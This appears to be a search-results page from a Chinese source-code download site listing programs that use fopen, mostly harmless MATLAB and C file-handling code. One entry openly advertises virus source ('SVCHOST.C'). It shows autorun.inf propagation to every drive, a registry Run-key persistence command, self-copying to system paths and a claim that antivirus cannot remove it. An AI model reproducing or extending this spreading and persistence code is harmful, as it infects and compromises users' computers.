Hot Search : Source embeded web remote control p2p game More...
Location : Home Search - fopen
Search - fopen - List
DL : 0
该源文件在Microsoft Visual C++ 6.0环境下编译通过,程序目的旨在基于文件操作fopen等函数,以及bmp编码格式技术,绘制简单的函数曲线(圆,正弦),结果保存在位图Image.bmp中,该程序还可以扩展功能,修改方程,生成自己想要的图片-The source file in Microsoft Visual C++ 6.0 environment, compiled by the program is aimed at file-based operations such as fopen function, as well as bmp encoding techniques, draw a simple function curve (circle, sine), the result stored in bitmap Image.bmp , the program can also be extended functionality, modify the equation, the picture you want to generate their own
Update : 2024-05-05 Size : 44032 Publisher : huxuec

DL : 0
讀寫到文件,用 fopen 開一個文件,又用printf 打印出 command prompt 出來-opening and writing to files
Update : 2024-05-05 Size : 62464 Publisher : ash

DL : 0
1支持采集器设置无限过滤功能; 2支持文章内图片采集保存到本地,自动替换文件名避免重复; 3支持文章内FLASH文件采集保存到本地; 4支持限制PHP FOPEN函数功能的虚拟主机;-A support for the collector to set unlimited filtering two picture collections helped to support the article to the local, automatically replace the file name to avoid duplication 3 to support the article FLASH file is saved to a local collection 4 support restrictions on PHP FOPEN function function virtual host
Update : 2024-05-05 Size : 5985280 Publisher : 黎明信

DL : 0
function matrix=asciiRead(fileName) asciiRead: Read an ascii file into a matrix Usage: matrix=asciiRead(fileName) Roger Jang, 20041021 if nargin<1, selfdemo return end fid=fopen(fileName, rb ) content=fread(fid, inf, char ) fclose(fid) file=tempname copyfile(fileName, file-function matrix=asciiRead(fileName) asciiRead: Read an ascii file into a matrix Usage: matrix=asciiRead(fileName) Roger Jang, 20041021 if nargin<1, selfdemo return end fid=fopen(fileName, rb ) content=fread(fid, inf, char ) fclose(fid) file=tempname copyfile(fileName, file
Update : 2024-05-05 Size : 2048 Publisher : jafar

Otherhtni
DL : 0
function matrix=asciiRead(fileName) asciiRead: Read an ascii file into a matrix Usage: matrix=asciiRead(fileName) Roger Jang, 20041021 if nargin<1, selfdemo return end fid=fopen(fileName, rb ) content=fread(fid, inf, char ) fclose(fid) file=tempname copyfile(fileName, file-function matrix=asciiRead(fileName) asciiRead: Read an ascii file into a matrix Usage: matrix=asciiRead(fileName) Roger Jang, 20041021 if nargin<1, selfdemo return end fid=fopen(fileName, rb ) content=fread(fid, inf, char ) fclose(fid) file=tempname copyfile(fileName, file
Update : 2024-05-05 Size : 3072 Publisher : jafar

Otherswcf
DL : 0
function matrix=asciiRead(fileName) asciiRead: Read an ascii file into a matrix Usage: matrix=asciiRead(fileName) Roger Jang, 20041021 if nargin<1, selfdemo return end fid=fopen(fileName, rb ) content=fread(fid, inf, char ) fclose(fid) file=tempname copyfile(fileName, file-function matrix=asciiRead(fileName) asciiRead: Read an ascii file into a matrix Usage: matrix=asciiRead(fileName) Roger Jang, 20041021 if nargin<1, selfdemo return end fid=fopen(fileName, rb ) content=fread(fid, inf, char ) fclose(fid) file=tempname copyfile(fileName, file
Update : 2024-05-05 Size : 5120 Publisher : jafar

Othermex
DL : 0
function matrix=asciiRead(fileName) asciiRead: Read an ascii file into a matrix Usage: matrix=asciiRead(fileName) Roger Jang, 20041021 if nargin<1, selfdemo return end fid=fopen(fileName, rb ) content=fread(fid, inf, char ) fclose(fid) file=tempname copyfile(fileName, file-function matrix=asciiRead(fileName) asciiRead: Read an ascii file into a matrix Usage: matrix=asciiRead(fileName) Roger Jang, 20041021 if nargin<1, selfdemo return end fid=fopen(fileName, rb ) content=fread(fid, inf, char ) fclose(fid) file=tempname copyfile(fileName, file
Update : 2024-05-05 Size : 2048 Publisher : jafar

在内存中实现文件系统,接口兼容fopen,read,write,适用于没有文件系统的嵌入式系统开发。可以根据自身需要配置文件大小和数量。-In memory for file system, interface compatible with fopen, read, write,suitable for embedded system development. Configuration files according to their size and number required.
Update : 2024-05-05 Size : 133120 Publisher : stefzhl

DL : 0
《实用小波分析》附录中STFT源代码(VC中编译链接正确,运行出错fopen处;WinTC中可以运行,我电脑显卡有问题,未显示出结果;Turbo C中未生成目标文件)-This program is for computing the STFT of the signal in a data file and create a output data file containing STFT result.
Update : 2024-05-05 Size : 2102272 Publisher :

DL : 0
简单C函数实现的打包解包小工具:基本上只用C语言文件操作函数fopen,fread fwrite等实现的打包小工具-Simple C functions is packaged unpack Gadgets: Basically, only C language file manipulation functions fopen, fread fwrite, etc. to achieve the packaging Gadgets
Update : 2024-05-05 Size : 44032 Publisher : haochaoqing

DL : 0
统计对话框,用户可以自行设置统计的内容,这是初始设计,用户可以进一步来设置系统的目标-Statistics dialog box, the user can set the statistics of the content, which is the initial design, the user can set the system to further the objectives
Update : 2024-05-05 Size : 28672 Publisher : 罗费

DL : 0
function total_length=text_length_num(file_cell) total_length=0 for i=1:length(file_cell) y1=char(file_cell(i)) for j=1:length(y1) if(y1(j)== > ) got=j-3 end end y= for k=1:got y(k)=y1(k) end [a,b,c,d]=fileparts(y) FileName=[b c] fid=fopen(y) total_length_char=0 while 1 tline = fgetl(fid) if ~ischar(tline), break,-function total_length=text_length_num(file_cell) total_length=0 for i=1:length(file_cell) y1=char(file_cell(i)) for j=1:length(y1) if(y1(j)== > ) got=j-3 end end y= for k=1:got y(k)=y1(k) end [a,b,c,d]=fileparts(y) FileName=[b c] fid=fopen(y) total_length_char=0 while 1 tline = fgetl(fid) if ~ischar(tline), break,
Update : 2024-05-05 Size : 1024 Publisher : thinkingbig4

matlabFBG
DL : 0
FBG反射谱,要用的人会非常需要,需要的人可以看看,很不错的-FBG id1=fopen( lambdaCMT.txt , wt ) fid2=fopen( rhoCMT.txt , wt ) f1=inline( -i.*delta.*y1-k.*y2 , t , lambda , wk , delta , k , y1 , y2 ) f2=inline( -k.*y1+i.*delta.*y2 , t , lambda , wk , delta , k , y1 , y2 ) lambda=1547 while lambda<1552 t0=-501426 h=2.0057e+003 n=500 y1=1 y2=0
Update : 2024-05-05 Size : 1024 Publisher : Xiaojun

在Arm Ucos平台上扩展及使用文件,含操作函数fopen ()、fRead ()、fWrite()、fClose()等-In Arm Ucos platform ,extend and the use of file system, including follow operations about fopen (), fRead (), fWrite (), fClose ()functions, etc.
Update : 2024-05-05 Size : 799744 Publisher : zhaojiahua

DL : 0
1.实现了YUV到BGR的转换 2.实现了一个移动侦测算法 3.实现了一个高速sqrt函数 4.请自己下载一个YUV文件,按照fopen中所写的路径存放-1. To achieve the conversion of YUV to BGR 2. Implements a motion detection algorithm 3. Implements a high-speed sqrt function 4. You to download a YUV file, written in accordance with the path stored fopen
Update : 2024-05-05 Size : 2666496 Publisher : 成海波

DL : 0
1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件 2.在C、D、E盘中生成自动运行文件 3.注册c:\windows\system\svchost.exe,使其开机自动运行 4.在C:\windows\system下生成隐蔽DLL文件 5.病毒在执行后具有相联复制能力 1.在所有磁盘的根目录生成svchost.com和autorun.inf文件 2.生成病毒体: c:\windows\wjview32.com c:\windows\explorer.exe c:\windows\system32\dllcache\explorer.exe c:\windows\system\msmouse.dll c:\windows\system32\cmdsys.sys c:\windows\system32\mstsc32.exe 3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在 本病毒到目前为止任何杀毒软件都无法将其查杀 本病毒单机默认使用对机器无害(破坏代码已屏蔽) 提供病毒卸载程序(保存为X.BAT,双击运行即可卸载): 函数:制造垃圾文件 1.可以用于病毒开机自启动的注册表位置:-/* SVCHOST.C */ /* SVCHOST.EXE*/ #define SVCHOST_NUM 6 #include<stdio.h> #include<string.h> char*autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"} char*files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"} char*files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL", "c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe", "c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"} char*regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f" int copy(char*infile,char*outfile) { FILE*input,*output char temp if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen (outfile,"wb"))!=NULL)) { while(!feof(input)) { fread(&temp,1,1,input) fwrite(&temp,1,1
Update : 2024-05-05 Size : 7168 Publisher : 2626648

也在找关于这方面的资料着~~我是有matlab程序,但是在Java里没法触发调用它~~ 付上matlab程序,有需要的自己拿吧。 function BinaryIntegerProg(f_file_name, A_file_name, b_file_name, Aeq_file_name, beq_file_name,write_file_name) f = load(f_file_name) A = load(A_file_name) b = load(b_file_name) Aeq = load(Aeq_file_name) Beq = load(beq_file_name) x = bintprog(f, A, b, Aeq, beq) fp = fopen(write_file_name, w ) fprintf(fp, d\n ,x) fclose(fp)-good daima!
Update : 2024-05-05 Size : 16384 Publisher : 夏双喜

DL : 0
发送一个开放声音控制(OSC)的信息通过UDP连接 oscsend(美,路径) oscsend(美,路径,类型,arg1的,arg2的,...) oscsedn(美,路径,类型,[参数]) ü= UDP的对象与打开的连接。 路径=路径字符串 =同类型的参数类型的字符串, 支持: 我=整数 f=浮动 商S =串 每组空(忽略相应的参数) 余=脉冲(忽略相应的参数) T=真(忽略相应的参数) F=假(忽略相应的参数) 乙=布尔(不是官方:将参数为T/在F型) 不支持: b=一滴 参数=参数所指定的类型。 示例 ü=的UDP( 127.0.0.1 ,7488) 的FOPEN(美) oscsend(ü, /测试 , ifsINBTF ,1,3.14, 您好 ,[],[],虚假,[],[]) fclose(美) 如需关于振荡信息http://opensoundcontrol.org/。-Sends a Open Sound Control (OSC) message through a UDP connection oscsend(u,path) oscsend(u,path,types,arg1,arg2,...) oscsedn(u,path,types,[args]) u = UDP object with open connection. path = path-string types = string with types of arguments, supported: i = integer f = float s = string N = Null (ignores corresponding argument) I = Impulse (ignores corresponding argument) T = True (ignores corresponding argument) F = False (ignores corresponding argument) B = boolean (not official: converts argument to T/F in the type) not supported: b = blob args = arguments as specified by types. EXAMPLE u = udp( 127.0.0.1 ,7488) fopen(u) oscsend(u, /test , ifsINBTF , 1, 3.14, hello ,[],[],false,[],[]) fclose(u) See http://opensoundcontrol.org/ for more information about OSC.
Update : 2024-05-05 Size : 2048 Publisher : abeaqhax

DL : 0
可以处理三维矩阵数据,三维数组的线性化处理,-#include<stdio.h> #define N 56 #define M 56 #define L 336 #define Leng 23.693 double V[N][M][L] void main() { int i, j, k double Z[L], ZL[L], S, A FILE*fp1,*fp2 if ((fp1 = fopen("LOCPOT","r+"))==NULL) printf("ERRO,can not open the file1") else for(k=0 k<=L-1 k++) for(j=0 j<=M-1 j++) for (i=0 i<=N-1 i++) fscanf(fp1," lf",&V[i][j][k]) fclose(fp1)
Update : 2024-05-05 Size : 1024 Publisher : 王思栋

DL : 0
采样频率 fs=10000 轴承外环故障信号 fid=fopen( bearingout.dat , r ) 故障 N=1024 xdata=fread(fid,N, int16 ) fclose(fid) xdata=(xdata-mean(xdata))/std(xdata,1) 时域波形 figure(1) plot(1:N,xdata) xlabel( 时间 t/n ) ylabel( 电压 V/v ) db10小波进行4层分解 一维小波分解 [c,l] = wavedec(xdata,4, db10 ) 重构第1~4层细节信号 d4 = wrcoef( d ,c,l, db10 ,4) d3 = wrcoef( d ,c,l, db10 ,3) d2 = wrcoef( d ,c,l, db10 ,2) d1 = wrcoef( d ,c,l, db10 ,1) - Sampling frequency fs = 10000 bearing outer ring fault signal fid = fopen (' bearingout.dat' , ' r' ) failure N = 1024 xdata = fread (fid, N, ' int16' ) fclose (fid ) xdata = (xdata-mean (xdata))/std (xdata, 1) time-domain waveform figure (1) plot (1: N, xdata) xlabel (' Time t/n' ) ylabel ( ' voltage V/v' ) db10 wavelet decomposition 4 layer one-dimensional wavelet decomposition [c, l] = wavedec (xdata, 4, ' db10' ) 1 ~ 4 reconstructed detail signal d4 = wrcoef (' d' , c, l, ' db10' , 4) d3 = wrcoef (' d' , c, l, ' db10' , 3) d2 = wrcoef (' d' , c, l, ' db10' , 2) d1 = wrcoef (' d' , c, l, ' db10' , 1)
Update : 2024-05-05 Size : 1024 Publisher : 王飞
« 1 2 34 5 »
DSSZ is the largest source code store in internet!
Contact us :
1999-2046 DSSZ All Rights Reserved.